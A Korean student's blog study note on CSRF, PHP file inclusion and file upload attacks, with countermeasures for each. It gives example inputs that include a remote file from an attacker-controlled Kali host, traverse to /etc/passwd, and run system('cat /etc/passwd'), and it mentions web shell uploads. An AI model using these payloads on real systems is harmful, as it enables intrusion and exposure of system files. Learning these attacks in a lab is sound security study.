728x90
253p~281p / CSRF, 파일 인클루젼,파일 업로드 개념 분석
내용 간단 요약
- CSRF(크로스 사이트 요청 변조) 공격
- 링크를 누르면 …/?password_new=baadd1… 요청이 쿠키와 함께 사이트로 보내짐-코드 중 XMLHttpRequest() 이용하여 쿠키 보내기 ->비밀번호 임의로 바꾸기 가능
- 대응방법: CSRF 토큰을 이용하여 공격자가 모르는 토큰으로 사용자의 요청인지 인증을 받는다(XSS를 이용하여 토큰을 알아낼수도 있음)
- 파일 인클루전 공격
- PHP 애플리케이션을 대상으로 발생
- include 함수를 이용하여 외부 사용자가 파일을 지정하면 취약점 발생
ex) page=file1.php 처럼 파일 경로가 url에 있고 경로를 수정하면 여는파일이 달라질때 사용가능, page=http://<칼리 IP>/bad.php 하거나
page=../../../../../etc/passwd로 하면 파일을 볼 수 있다.
-bad.php에는 system(“cat /etc/passwd”); 가 있다.
- 공격대응: 외부 사용자가 입력한 파일 이름을 인클루드에 사용하지 않음, 입력받을 경우에는 입력값 검증-화이트리스트 검증,http나 https, ../ 등 차단
- 파일 업로드 공격
- 파일에 웹쉘 업로드하고 업로드 된 경로를 유추하여 접속한다. 폼으로 명령어 작성,실행
- 대응방법: 확장자와 내용 검사, 파일을 접근 불가능한 경로에 저장, 확장자 바꾸거나 제거하여 저장
잘 이해되지 않는 것들
- 파일 인클루전 공격이 제대로 수행되지않는다. 사이트에 파일이 포함되지 않고 로딩만 된다. -> 네트워크 설정 잘못되었다.
- CSRF에서 어떻게 사이트를 사용자에게 띄우는지 모르겠다.
-> 이메일로 링크를 보내 클릭하여 사이트에 접속하게한다.
책 외부에서 알게 된 내용
- php wrapper도 이용을 많이 한다.
회고
잘한 것은 무엇인가?
워게임을 풀어보았다.
잘못한 것은 무엇인가?
아직도 안 풀린 궁금증은 무엇인가? 왜 풀리지 않았는가?
향후 어떻게 다르게 할 것 인가?
728x90
'보안공부 > 웹해킹입문-lv.0' 카테고리의 다른 글
0131 16장 알려진 취약점을 이용한 공격(heartbleed, 쉘쇼크, php_cgi) (0) | 2022.01.31 |
---|---|
0127 13장~15장 / 민감한 데이터 노출, 접근 통제 취약점 공격, XXE 개념 분석 (0) | 2022.01.27 |
0122 커맨드 인젝션,XSS 개념 분석 (0) | 2022.01.22 |
0117 4장~7장 버프스위트, 정보수집, brute force, sql injection (0) | 2022.01.17 |
0112 ~71p / 1장 ~ 3장 (0) | 2022.01.17 |